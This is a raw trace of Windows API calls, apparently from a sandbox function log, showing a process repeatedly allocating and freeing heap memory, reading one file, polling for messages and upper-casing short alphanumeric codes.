[0254.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0254.010] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0254.010] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x16f0, lpOverlapped=0x0) returned 1 [0254.011] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0254.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16f0) returned 0x24f7260 [0254.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0254.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0254.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0254.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16f0) returned 0x34a4048 [0254.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0254.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16f0) returned 0x24f7260 [0254.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f7260 | out: hHeap=0x25c0000) returned 1 [0254.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.016] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.017] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0254.017] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0254.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0254.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16f0) returned 0x24f7260 [0254.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0254.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0254.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0254.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16f0) returned 0x34a5740 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0254.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0254.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0254.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.020] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0254.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0254.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0254.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0254.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.023] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0254.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.024] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0254.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.025] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.026] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.026] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.027] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0254.027] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0254.027] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.027] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0254.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0254.027] CharUpperBuffW (in: lpsz="SSA060070245B", 